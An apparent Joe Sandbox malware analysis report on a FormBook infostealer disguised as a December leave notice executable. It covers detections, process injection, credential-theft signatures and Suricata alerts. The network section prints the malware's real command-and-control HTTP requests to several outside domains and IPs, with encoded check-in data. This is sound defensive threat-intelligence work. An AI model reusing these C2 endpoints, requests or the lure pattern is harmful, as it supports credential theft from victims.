Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Mandatory Notice for all December Leave and Vacation application.exe

Overview

General Information

Sample name:Mandatory Notice for all December Leave and Vacation application.exe
Analysis ID:1560288
MD5:201ad7754669b4d766349530adcca029
SHA1:52d55c5235158a805ff0059793c5f349ccd87684
SHA256:e16a801f068e55f9b014ac4b4cde9415fec763830ef433cb4eb3e0ee9734bf04
Tags:exeuser-pr0xylife
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Mandatory Notice for all December Leave and Vacation application.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe" MD5: 201AD7754669B4D766349530ADCCA029)
    • svchost.exe (PID: 6152 cmdline: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • eAdBvdCMNQkVZK.exe (PID: 3380 cmdline: "C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • Utilman.exe (PID: 6020 cmdline: "C:\Windows\SysWOW64\Utilman.exe" MD5: 4F59EE095E37A83CDCB74091C807AFA9)
          • eAdBvdCMNQkVZK.exe (PID: 6308 cmdline: "C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5328 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2516266335.00000000037A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.4579368467.0000000002A00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.4580545569.00000000046C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2513025295.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.4580597058.0000000004710000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe", CommandLine: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe", CommandLine|base64offset|contains: 6bq, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe", ParentImage: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe, ParentProcessId: 7164, ParentProcessName: Mandatory Notice for all December Leave and Vacation application.exe, ProcessCommandLine: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe", ProcessId: 6152, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe", CommandLine: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe", CommandLine|base64offset|contains: 6bq, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe", ParentImage: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe, ParentProcessId: 7164, ParentProcessName: Mandatory Notice for all December Leave and Vacation application.exe, ProcessCommandLine: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe", ProcessId: 6152, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-21T16:17:42.074240+010020507451Malware Command and Control Activity Detected192.168.2.549801154.12.28.18480TCP
                2024-11-21T16:17:56.788087+010020507451Malware Command and Control Activity Detected192.168.2.549980104.21.41.7480TCP
                2024-11-21T16:18:11.891178+010020507451Malware Command and Control Activity Detected192.168.2.549984172.67.167.14680TCP
                2024-11-21T16:18:27.090850+010020507451Malware Command and Control Activity Detected192.168.2.549988216.40.34.4180TCP
                2024-11-21T16:18:41.990763+010020507451Malware Command and Control Activity Detected192.168.2.54999213.248.169.4880TCP
                2024-11-21T16:18:57.059059+010020507451Malware Command and Control Activity Detected192.168.2.549996209.74.77.10880TCP
                2024-11-21T16:19:12.686987+010020507451Malware Command and Control Activity Detected192.168.2.55000038.47.232.19480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-21T16:17:42.074240+010028554651A Network Trojan was detected192.168.2.549801154.12.28.18480TCP
                2024-11-21T16:17:56.788087+010028554651A Network Trojan was detected192.168.2.549980104.21.41.7480TCP
                2024-11-21T16:18:11.891178+010028554651A Network Trojan was detected192.168.2.549984172.67.167.14680TCP
                2024-11-21T16:18:27.090850+010028554651A Network Trojan was detected192.168.2.549988216.40.34.4180TCP
                2024-11-21T16:18:41.990763+010028554651A Network Trojan was detected192.168.2.54999213.248.169.4880TCP
                2024-11-21T16:18:57.059059+010028554651A Network Trojan was detected192.168.2.549996209.74.77.10880TCP
                2024-11-21T16:19:12.686987+010028554651A Network Trojan was detected192.168.2.55000038.47.232.19480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-21T16:17:48.785814+010028554641A Network Trojan was detected192.168.2.549977104.21.41.7480TCP
                2024-11-21T16:17:51.563396+010028554641A Network Trojan was detected192.168.2.549978104.21.41.7480TCP
                2024-11-21T16:17:54.274176+010028554641A Network Trojan was detected192.168.2.549979104.21.41.7480TCP
                2024-11-21T16:18:03.848431+010028554641A Network Trojan was detected192.168.2.549981172.67.167.14680TCP
                2024-11-21T16:18:06.502736+010028554641A Network Trojan was detected192.168.2.549982172.67.167.14680TCP
                2024-11-21T16:18:09.180543+010028554641A Network Trojan was detected192.168.2.549983172.67.167.14680TCP
                2024-11-21T16:18:19.133474+010028554641A Network Trojan was detected192.168.2.549985216.40.34.4180TCP
                2024-11-21T16:18:21.717739+010028554641A Network Trojan was detected192.168.2.549986216.40.34.4180TCP
                2024-11-21T16:18:24.520226+010028554641A Network Trojan was detected192.168.2.549987216.40.34.4180TCP
                2024-11-21T16:18:34.167613+010028554641A Network Trojan was detected192.168.2.54998913.248.169.4880TCP
                2024-11-21T16:18:36.605188+010028554641A Network Trojan was detected192.168.2.54999013.248.169.4880TCP
                2024-11-21T16:18:39.226917+010028554641A Network Trojan was detected192.168.2.54999113.248.169.4880TCP
                2024-11-21T16:18:49.052658+010028554641A Network Trojan was detected192.168.2.549993209.74.77.10880TCP
                2024-11-21T16:18:51.738208+010028554641A Network Trojan was detected192.168.2.549994209.74.77.10880TCP
                2024-11-21T16:18:54.457347+010028554641A Network Trojan was detected192.168.2.549995209.74.77.10880TCP
                2024-11-21T16:19:04.676553+010028554641A Network Trojan was detected192.168.2.54999738.47.232.19480TCP
                2024-11-21T16:19:07.346492+010028554641A Network Trojan was detected192.168.2.54999838.47.232.19480TCP
                2024-11-21T16:19:10.018402+010028554641A Network Trojan was detected192.168.2.54999938.47.232.19480TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: Mandatory Notice for all December Leave and Vacation application.exeReversingLabs: Detection: 36%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2516266335.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4579368467.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4580545569.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2513025295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4580597058.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2517323526.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4580892352.0000000005940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Mandatory Notice for all December Leave and Vacation application.exeJoe Sandbox ML: detected
                Source: Mandatory Notice for all December Leave and Vacation application.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: Utilman.pdb source: svchost.exe, 00000002.00000003.2458768398.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2459521153.0000000003232000.00000004.00000020.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000004.00000002.4579939459.00000000013F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eAdBvdCMNQkVZK.exe, 00000004.00000000.2397251111.0000000000D5E000.00000002.00000001.01000000.00000005.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4579697275.0000000000D5E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2129285578.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2130064059.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2382192450.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380304831.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2516358998.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2516358998.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4580828676.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2516921696.0000000004751000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4580828676.0000000004A9E000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2512946824.00000000045A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2129285578.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2130064059.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2382192450.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380304831.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2516358998.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2516358998.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4580828676.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2516921696.0000000004751000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4580828676.0000000004A9E000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2512946824.00000000045A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Utilman.pdbGCTL source: svchost.exe, 00000002.00000003.2458768398.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2459521153.0000000003232000.00000004.00000020.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000004.00000002.4579939459.00000000013F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: Utilman.exe, 00000005.00000002.4581410453.0000000004F2C000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4579598695.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000000.2583515197.000000000310C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2809230685.0000000031E5C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: Utilman.exe, 00000005.00000002.4581410453.0000000004F2C000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4579598695.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000000.2583515197.000000000310C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2809230685.0000000031E5C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FC6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00FC6CA9
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FC60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00FC60DD
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FC63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00FC63F9
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FCEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FCEB60
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FCF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00FCF5FA
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FCF56F FindFirstFileW,FindClose,0_2_00FCF56F
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FD1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FD1B2F
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FD1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FD1C8A
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FD1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FD1F94

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49801 -> 154.12.28.184:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49801 -> 154.12.28.184:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49978 -> 104.21.41.74:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49980 -> 104.21.41.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49996 -> 209.74.77.108:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49984 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49984 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49996 -> 209.74.77.108:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49977 -> 104.21.41.74:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49992 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49992 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 38.47.232.194:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49988 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49988 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 209.74.77.108:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 209.74.77.108:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49980 -> 104.21.41.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50000 -> 38.47.232.194:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50000 -> 38.47.232.194:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 38.47.232.194:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 209.74.77.108:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 38.47.232.194:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49979 -> 104.21.41.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 172.67.167.146:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.tals.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FD4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00FD4EB5
                Source: global trafficHTTP traffic detected: GET /cbbl/?StWXF0Jx=paPsyhkx/nE5gApK7ClsOsCP/JDiOaF/PnUzFNUQtr02YB3yPLZBYvOPPEhjPOJc5o/riszcMLT4SZEyBJ2Z4+e1R3WiL7BxGKUkfd9BrL6F2CyldUW6llWN7R81fMOOmA==&zfI=jXEDeV4Xp62 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.7261ltajbc.bondConnection: closeUser-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                Source: global trafficHTTP traffic detected: GET /us5e/?StWXF0Jx=+3wdxQ15dA0PRlxlyKsnTLOlEhuFd9nhpeMIpGJhTalb6rEI4lQ5upkBauNLLCI1kwggOdPP7drS+cJ7ELELPajCaX5eVWqFhVj1FJt4Lm6snm9lne8G6LEoCHfH0EAuWA==&zfI=jXEDeV4Xp62 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.conansog.shopConnection: closeUser-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                Source: global trafficHTTP traffic detected: GET /zr8v/?zfI=jXEDeV4Xp62&StWXF0Jx=Ml5gZJW5QcanJzzDoQq3UEdCVeZH9JbjcVoAzcC8IkgnBjkPfLtOabWm5tXm+g1ABEyKJ0nQQaWBnIlmZ5M263kDoloi41FTqGteT0eMG8ZHw0bPQeAXlqBGUQENUFkujA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.rgenerousrs.storeConnection: closeUser-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                Source: global trafficHTTP traffic detected: GET /ejy6/?StWXF0Jx=nKtLiO3xWkrMlPGEGL30zIXLkoLy8zu8J2L8rFbijJp7RB7dx3B4j1jKRr2O123OfZ5OtYyfrlQmcwQG+aranSp3PUfv2y2fa3KrcIq96NlU6xjN1E0Tt4TY0B9th5DEOw==&zfI=jXEDeV4Xp62 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.sipdontshoot.netConnection: closeUser-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                Source: global trafficHTTP traffic detected: GET /stx5/?zfI=jXEDeV4Xp62&StWXF0Jx=imPmf4gI1srj4STUrrMqNbgzS3ndO2Vfzd18ejlEFaVa4JSUkoHJ3l86KKOOva+7SWLQrsvslnf4fofCRXFAlseOCWBGmtkXklnnJa1INqnCq9NgN4lUNFEyHKg1xfk7mg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.tals.xyzConnection: closeUser-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
